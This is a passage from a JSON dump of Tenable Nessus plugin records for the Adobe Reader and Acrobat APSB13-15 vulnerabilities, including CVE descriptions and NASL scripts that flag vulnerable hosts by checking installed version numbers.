CVE-2013-2735, CVE-2013-2736, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow condition exists that allows an attacker to execute arbitrary code. (CVE-2013-2549)\n\n - A use-after-free error exists that allows an attacker to bypass the Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - A flaw exists in the JavaScript API that allows an attacker to obtain sensitive information.\n (CVE-2013-2737)\n\n - An unspecified stack overflow condition exists that allows an attacker to execute arbitrary code.\n (CVE-2013-2724)\n\n - Multiple unspecified buffer overflow conditions exist that allow an attacker to execute arbitrary code.\n (CVE-2013-2730, CVE-2013-2733)\n\n - Multiple unspecified integer overflow conditions exist that allow an attacker to execute arbitrary code.\n (CVE-2013-2727, CVE-2013-2729)\n\n - A flaw exists due to improper handling of operating system domain blacklists. An attacker can exploit this to have an unspecified impact. (CVE-2013-3342)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "modified": "2018-07-14T00:00:00", "id": "MACOSX_ADOBE_READER_APSB13-15.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=66411", "published": "2013-05-14T00:00:00", "title": "Adobe Reader < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15) (Mac OS X)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66411);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\n \"CVE-2013-2549\",\n \"CVE-2013-2550\",\n \"CVE-2013-2718\",\n \"CVE-2013-2719\",\n \"CVE-2013-2720\",\n \"CVE-2013-2721\",\n \"CVE-2013-2722\",\n \"CVE-2013-2723\",\n \"CVE-2013-2724\",\n \"CVE-2013-2725\",\n \"CVE-2013-2726\",\n \"CVE-2013-2727\",\n \"CVE-2013-2729\",\n \"CVE-2013-2730\",\n \"CVE-2013-2731\",\n \"CVE-2013-2732\",\n \"CVE-2013-2733\",\n \"CVE-2013-2734\",\n \"CVE-2013-2735\",\n \"CVE-2013-2736\",\n \"CVE-2013-2737\",\n \"CVE-2013-3337\",\n \"CVE-2013-3338\",\n \"CVE-2013-3339\",\n \"CVE-2013-3340\",\n \"CVE-2013-3341\",\n \"CVE-2013-3342\",\n \"CVE-2013-3346\"\n );\n script_bugtraq_id(\n 58398,\n 58568,\n 59902,\n 59903,\n 59904,\n 59905,\n 59906,\n 59907,\n 59908,\n 59909,\n 59910,\n 59911,\n 59912,\n 59913,\n 59914,\n 59915,\n 59916,\n 59917,\n 59918,\n 59919,\n 59920,\n 59921,\n 59923,\n 59925,\n 59926,\n 59927,\n 59930,\n 62149\n );\n script_xref(name:\"EDB-ID\", value:\"26703\");\n script_xref(name:\"ZDI\", value:\"ZDI-13-105\");\n script_xref(name:\"ZDI\", value:\"ZDI-13-106\");\n script_xref(name:\"ZDI\", value:\"ZDI-13-212\");\n\n script_name(english:\"Adobe Reader < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15) (Mac OS X)\");\n script_summary(english:\"Checks the version of Adobe Reader.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Adobe Reader on the remote Mac OS X host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Reader installed on the remote Mac OS X host is\nprior to 11.0.3, 10.1.7, or 9.5.5. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - Unspecified memory corruption issues exist that allow an\n attacker to execute arbitrary code. (CVE-2013-2718,\n CVE-2013-2719, CVE-2013-2720, CVE-2013-2721,\n CVE-2013-2722, CVE-2013-2723, CVE-2013-2725,\n CVE-2013-2726, CVE-2013-2731, CVE-2013-2732,\n CVE-2013-2734, CVE-2013-2735, CVE-2013-2736,\n CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\n CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow condition exists that allows an\n attacker to execute arbitrary code. (CVE-2013-2549)\n\n - A use-after-free error exists that allows an attacker to\n bypass the Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - A flaw exists in the JavaScript API that allows an\n attacker to obtain sensitive information.\n (CVE-2013-2737)\n\n - An unspecified stack overflow condition exists that\n allows an attacker to execute arbitrary code.\n (CVE-2013-2724)\n\n - Multiple unspecified buffer overflow conditions exist\n that allow an attacker to execute arbitrary code.\n (CVE-2013-2730, CVE-2013-2733)\n\n - Multiple unspecified integer overflow conditions exist\n that allow an attacker to execute arbitrary code.\n (CVE-2013-2727, CVE-2013-2729)\n\n - A flaw exists due to improper handling of operating\n system domain blacklists. An attacker can exploit this\n to have an unspecified impact. (CVE-2013-3342)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-105/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-106/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-212/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Reader version 11.0.3 / 10.1.7 / 9.5.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Reader ToolButton Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"macosx_adobe_reader_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/Adobe Reader\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"install_func.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\"))\n audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nif (!get_kb_item(\"Host/MacOSX/Version\"))\n audit(AUDIT_OS_NOT, \"Mac OS X\");\n\napp = \"Adobe Reader\";\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\nversion = install['version'];\npath = install['path'];\n\nver = split(version, sep:\".\", keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\nif (\n (ver[0] == 9 && ver[1] < 5) ||\n (ver[0] == 9 && ver[1] == 5 && ver[2] < 5)\n)\n fix = \"9.5.5\";\nelse if (\n (ver[0] == 10 && ver[1] < 1) ||\n (ver[0] == 10 && ver[1] == 1 && ver[2] < 7)\n)\n fix = \"10.1.7\";\nelse if (ver[0] == 11 && ver[1] == 0 && ver[2] < 3)\n fix = \"11.0.3\";\nelse\n fix = \"\";\n\nif (fix)\n{\n info =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:0, extra:info, severity:SECURITY_HOLE);\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app, version, path);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:54", "bulletinFamily": "scanner", "description": "The version of Adobe Acrobat installed on the remote host is earlier than 11.0.3 / 10.1.7 / 9.5.5. It is, therefore, affected by multiple vulnerabilities :\n\n - Unspecified memory corruption vulnerabilities exist that could lead to code execution. (CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-2736, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow error exists that could lead to code execution. (CVE-2013-2549)\n\n - A use-after-free error exists that could lead to a bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - An unspecified information leakage issue involving a JavaScript API exists. (CVE-2013-2737)\n\n - An unspecified stack overflow issue exists that could lead to code execution. (CVE-2013-2724)\n\n - An unspecified buffer overflow error exists that could lead to code execution. (CVE-2013-2730, CVE-2013-2733)\n\n - An unspecified integer overflow error exists that could lead to code execution. (CVE-2013-2727, CVE-2013-2729)\n\n - A flaw exists in the way Reader handles domains that have been blacklisted in the operating system.\n (CVE-2013-3342)", "modified": "2018-06-27T00:00:00", "id": "ADOBE_ACROBAT_APSB13-15.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=66409", "published": "2013-05-14T00:00:00", "title": "Adobe Acrobat < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66409);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\n \"CVE-2013-2549\",\n \"CVE-2013-2550\",\n \"CVE-2013-2718\",\n \"CVE-2013-2719\",\n \"CVE-2013-2720\",\n \"CVE-2013-2721\",\n \"CVE-2013-2722\",\n \"CVE-2013-2723\",\n \"CVE-2013-2724\",\n \"CVE-2013-2725\",\n \"CVE-2013-2726\",\n \"CVE-2013-2727\",\n \"CVE-2013-2729\",\n \"CVE-2013-2730\",\n \"CVE-2013-2731\",\n \"CVE-2013-2732\",\n \"CVE-2013-2733\",\n \"CVE-2013-2734\",\n \"CVE-2013-2735\",\n \"CVE-2013-2736\",\n \"CVE-2013-2737\",\n \"CVE-2013-3337\",\n \"CVE-2013-3338\",\n \"CVE-2013-3339\",\n \"CVE-2013-3340\",\n \"CVE-2013-3341\",\n \"CVE-2013-3342\",\n \"CVE-2013-3346\"\n );\n script_bugtraq_id(\n 58398,\n 58568,\n 59902,\n 59903,\n 59904,\n 59905,\n 59906,\n 59907,\n 59908,\n 59909,\n 59910,\n 59911,\n 59912,\n 59913,\n 59914,\n 59915,\n 59916,\n 59917,\n 59918,\n 59919,\n 59920,\n 59921,\n 59923,\n 59925,\n 59926,\n 59927,\n 59930,\n 62149\n );\n script_xref(name:\"EDB-ID\", value:\"26703\");\n\n script_name(english:\"Adobe Acrobat < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15)\");\n script_summary(english:\"Checks version of Adobe Acrobat\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The version of Adobe Acrobat installed on the remote Windows host is\naffected by multiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Adobe Acrobat installed on the remote host is earlier\nthan 11.0.3 / 10.1.7 / 9.5.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Unspecified memory corruption vulnerabilities exist that\n could lead to code execution. (CVE-2013-2718,\n CVE-2013-2719, CVE-2013-2720, CVE-2013-2721,\n CVE-2013-2722, CVE-2013-2723, CVE-2013-2725,\n CVE-2013-2726, CVE-2013-2731, CVE-2013-2732,\n CVE-2013-2734, CVE-2013-2735, CVE-2013-2736,\n CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\n CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow error exists that could lead to\n code execution. (CVE-2013-2549)\n\n - A use-after-free error exists that could lead to a\n bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - An unspecified information leakage issue involving a\n JavaScript API exists. (CVE-2013-2737)\n\n - An unspecified stack overflow issue exists that could\n lead to code execution. (CVE-2013-2724)\n\n - An unspecified buffer overflow error exists that could\n lead to code execution. (CVE-2013-2730, CVE-2013-2733)\n\n - An unspecified integer overflow error exists that could\n lead to code execution. (CVE-2013-2727, CVE-2013-2729)\n\n - A flaw exists in the way Reader handles domains that\n have been blacklisted in the operating system.\n (CVE-2013-3342)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-105/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-106/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-212/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Acrobat 11.0.3 / 10.1.7 / 9.5.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Reader ToolButton Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:'Windows');\n script_copyright(english:'This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.');\n\n script_dependencies('adobe_acrobat_installed.nasl');\n script_require_keys('SMB/Acrobat/Version');\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Acrobat/Version\");\nversion_ui = get_kb_item('SMB/Acrobat/Version_UI');\n\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui;\n\nver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\npath = get_kb_item_or_exit('SMB/Acrobat/Path');\n\nif (\n (ver[0] == 9 && ver[1] < 5) ||\n (ver[0] == 9 && ver[1] == 5 && ver[2] < 5) ||\n (ver[0] == 10 && ver[1] < 1) ||\n (ver[0] == 10 && ver[1] == 1 && ver[2] < 7) ||\n (ver[0] == 11 && ver[1] == 0 && ver[2] < 3)\n)\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : '+path+\n '\\n Installed version : '+version_report+\n '\\n Fixed version : 11.0.3 / 10.1.7 / 9.5.5\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe Acrobat\", version_report, path);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:54", "bulletinFamily": "scanner", "description": "The version of Adobe Reader installed on the remote host is earlier than 11.0.3 / 10.1.7 / 9.5.5. It is, therefore, affected by multiple vulnerabilities :\n\n - Unspecified memory corruption vulnerabilities exist that could lead to code execution. (CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-2736, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow error exists that could lead to code execution. (CVE-2013-2549)\n\n - A use-after-free error exists that could lead to a bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - An unspecified information leakage issue involving a JavaScript API exists. (CVE-2013-2737)\n\n - An unspecified stack overflow issue exists that could lead to code execution. (CVE-2013-2724)\n\n - An unspecified buffer overflow error exists that could lead to code execution. (CVE-2013-2730, CVE-2013-2733)\n\n - An unspecified integer overflow error exists that could lead to code execution. (CVE-2013-2727, CVE-2013-2729)\n\n - A flaw exists in the way Reader handles domains that have been blacklisted in the operating system.\n (CVE-2013-3342)", "modified": "2018-06-27T00:00:00", "id": "ADOBE_READER_APSB13-15.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=66410", "published": "2013-05-14T00:00:00", "title": "Adobe Reader < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66410);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2018/06/27 18:42:27\");\n\n script_cve_id(\n \"CVE-2013-2549\",\n \"CVE-2013-2550\",\n \"CVE-2013-2718\",\n \"CVE-2013-2719\",\n \"CVE-2013-2720\",\n \"CVE-2013-2721\",\n \"CVE-2013-2722\",\n \"CVE-2013-2723\",\n \"CVE-2013-2724\",\n \"CVE-2013-2725\",\n \"CVE-2013-2726\",\n \"CVE-2013-2727\",\n \"CVE-2013-2729\",\n \"CVE-2013-2730\",\n \"CVE-2013-2731\",\n \"CVE-2013-2732\",\n \"CVE-2013-2733\",\n \"CVE-2013-2734\",\n \"CVE-2013-2735\",\n \"CVE-2013-2736\",\n \"CVE-2013-2737\",\n \"CVE-2013-3337\",\n \"CVE-2013-3338\",\n \"CVE-2013-3339\",\n \"CVE-2013-3340\",\n \"CVE-2013-3341\",\n \"CVE-2013-3342\",\n \"CVE-2013-3346\"\n );\n script_bugtraq_id(\n 58398,\n 58568,\n 59902,\n 59903,\n 59904,\n 59905,\n 59906,\n 59907,\n 59908,\n 59909,\n 59910,\n 59911,\n 59912,\n 59913,\n 59914,\n 59915,\n 59916,\n 59917,\n 59918,\n 59919,\n 59920,\n 59921,\n 59923,\n 59925,\n 59926,\n 59927,\n 59930,\n 62149\n );\n script_xref(name:\"EDB-ID\", value:\"26703\");\n\n script_name(english:\"Adobe Reader < 11.0.3 / 10.1.7 / 9.5.5 Multiple Vulnerabilities (APSB13-15)\");\n script_summary(english:\"Checks version of Adobe Reader\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The version of Adobe Reader on the remote Windows host is affected by\nmultiple vulnerabilities.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of Adobe Reader installed on the remote host is earlier\nthan 11.0.3 / 10.1.7 / 9.5.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - Unspecified memory corruption vulnerabilities exist that\n could lead to code execution. (CVE-2013-2718,\n CVE-2013-2719, CVE-2013-2720, CVE-2013-2721,\n CVE-2013-2722, CVE-2013-2723, CVE-2013-2725,\n CVE-2013-2726, CVE-2013-2731, CVE-2013-2732,\n CVE-2013-2734, CVE-2013-2735, CVE-2013-2736,\n CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\n CVE-2013-3340, CVE-2013-3341, CVE-2013-3346)\n\n - An integer underflow error exists that could lead to\n code execution. (CVE-2013-2549)\n\n - A use-after-free error exists that could lead to a\n bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - An unspecified information leakage issue involving a\n JavaScript API exists. (CVE-2013-2737)\n\n - An unspecified stack overflow issue exists that could\n lead to code execution. (CVE-2013-2724)\n\n - An unspecified buffer overflow error exists that could\n lead to code execution. (CVE-2013-2730, CVE-2013-2733)\n\n - An unspecified integer overflow error exists that could\n lead to code execution. (CVE-2013-2727, CVE-2013-2729)\n\n - A flaw exists in the way Reader handles domains that\n have been blacklisted in the operating system.\n (CVE-2013-3342)\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-105/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-106/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-212/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.adobe.com/support/security/bulletins/apsb13-15.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Adobe Reader 11.0.3 / 10.1.7 / 9.5.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Reader ToolButton Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:acrobat_reader\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:'Windows');\n script_copyright(english:'This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.');\n\n script_dependencies('adobe_reader_installed.nasl');\n script_require_keys('SMB/Acroread/Version');\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\n\ninfo = '';\ninfo2 = '';\nvuln = 0;\nvers = get_kb_list('SMB/Acroread/Version');\nif (isnull(vers)) audit(AUDIT_KB_MISSING, 'SMB/Acroread/Version');\n\nforeach version (vers)\n{\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n path = get_kb_item('SMB/Acroread/'+version+'/Path');\n if (isnull(path)) path = 'n/a';\n\n verui = get_kb_item('SMB/Acroread/'+version+'/Version_UI');\n if (isnull(verui)) verui = version;\n\n if (\n (ver[0] == 9 && ver[1] < 5) ||\n (ver[0] == 9 && ver[1] == 5 && ver[2] < 5) ||\n (ver[0] == 10 && ver[1] < 1) ||\n (ver[0] == 10 && ver[1] == 1 && ver[2] < 7) ||\n (ver[0] == 11 && ver[1] == 0 && ver[2] < 3)\n )\n {\n vuln++;\n info += '\\n Path : '+path+\n '\\n Installed version : '+verui+\n '\\n Fixed version : 11.0.3 / 10.1.7 / 9.5.5\\n';\n }\n else\n info2 += \" and \" + verui;\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n if (vuln > 1) s = \"s of Adobe Reader are\";\n else s = \" of Adobe Reader is\";\n\n report =\n '\\nThe following vulnerable instance'+s+' installed on the'+\n '\\nremote host :\\n'+\n info;\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n\n exit(0);\n}\n\nif (info2)\n{\n info2 -= \" and \";\n if (\" and \" >< info2) be = \"are\";\n else be = \"is\";\n\n exit(0, \"The host is not affected since Adobe Reader \"+info2+\" \"+be+\" installed.\");\n}\nelse exit(1, \"Unexpected error - 'info2' is empty.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:19:54", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201308-03 (Adobe Reader: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Reader. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could entice a user to open a specially crafted PDF file, possibly resulting in arbitrary code execution or a Denial of Service condition. A local attacker could gain privileges via unspecified vectors.\n Workaround :\n\n There is no known workaround at this time.", "modified": "2018-07-11T00:00:00", "id": "GENTOO_GLSA-201308-03.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=69454", "published": "2013-08-23T00:00:00", "title": "GLSA-201308-03 : Adobe Reader: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201308-03.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69454);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/07/11 17:09:26\");\n\n script_cve_id(\"CVE-2012-1525\", \"CVE-2012-1530\", \"CVE-2012-2049\", \"CVE-2012-2050\", \"CVE-2012-2051\", \"CVE-2012-4147\", \"CVE-2012-4148\", \"CVE-2012-4149\", \"CVE-2012-4150\", \"CVE-2012-4151\", \"CVE-2012-4152\", \"CVE-2012-4153\", \"CVE-2012-4154\", \"CVE-2012-4155\", \"CVE-2012-4156\", \"CVE-2012-4157\", \"CVE-2012-4158\", \"CVE-2012-4159\", \"CVE-2012-4160\", \"CVE-2012-4363\", \"CVE-2013-0601\", \"CVE-2013-0602\", \"CVE-2013-0603\", \"CVE-2013-0604\", \"CVE-2013-0605\", \"CVE-2013-0606\", \"CVE-2013-0607\", \"CVE-2013-0608\", \"CVE-2013-0609\", \"CVE-2013-0610\", \"CVE-2013-0611\", \"CVE-2013-0612\", \"CVE-2013-0613\", \"CVE-2013-0614\", \"CVE-2013-0615\", \"CVE-2013-0616\", \"CVE-2013-0617\", \"CVE-2013-0618\", \"CVE-2013-0619\", \"CVE-2013-0620\", \"CVE-2013-0621\", \"CVE-2013-0622\", \"CVE-2013-0623\", \"CVE-2013-0624\", \"CVE-2013-0626\", \"CVE-2013-0627\", \"CVE-2013-0640\", \"CVE-2013-0641\", \"CVE-2013-2549\", \"CVE-2013-2550\", \"CVE-2013-2718\", \"CVE-2013-2719\", \"CVE-2013-2720\", \"CVE-2013-2721\", \"CVE-2013-2722\", \"CVE-2013-2723\", \"CVE-2013-2724\", \"CVE-2013-2725\", \"CVE-2013-2726\", \"CVE-2013-2727\", \"CVE-2013-2729\", \"CVE-2013-2730\", \"CVE-2013-2731\", \"CVE-2013-2732\", \"CVE-2013-2733\", \"CVE-2013-2734\", \"CVE-2013-2735\", \"CVE-2013-2736\", \"CVE-2013-2737\", \"CVE-2013-3337\", \"CVE-2013-3338\", \"CVE-2013-3339\", \"CVE-2013-3340\", \"CVE-2013-3341\", \"CVE-2013-3342\");\n script_bugtraq_id(55005, 55006, 55008, 55010, 55011, 55012, 55013, 55015, 55016, 55017, 55018, 55019, 55020, 55021, 55024, 55026, 55027, 55055, 57263, 57264, 57265, 57268, 57269, 57270, 57272, 57273, 57274, 57275, 57276, 57277, 57282, 57283, 57284, 57285, 57286, 57287, 57289, 57290, 57291, 57292, 57293, 57294, 57295, 57296, 57297, 57931, 57947, 58398, 58568, 59902, 59903, 59904, 59905, 59906, 59907, 59908, 59909, 59910, 59911, 59912, 59913, 59914, 59915, 59916, 59917, 59918, 59919, 59920, 59921, 59923, 59925, 59926, 59927, 59930);\n script_xref(name:\"GLSA\", value:\"201308-03\");\n\n script_name(english:\"GLSA-201308-03 : Adobe Reader: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201308-03\n(Adobe Reader: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Reader. Please\n review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted PDF\n file, possibly resulting in arbitrary code execution or a Denial of\n Service condition. A local attacker could gain privileges via unspecified\n vectors.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n 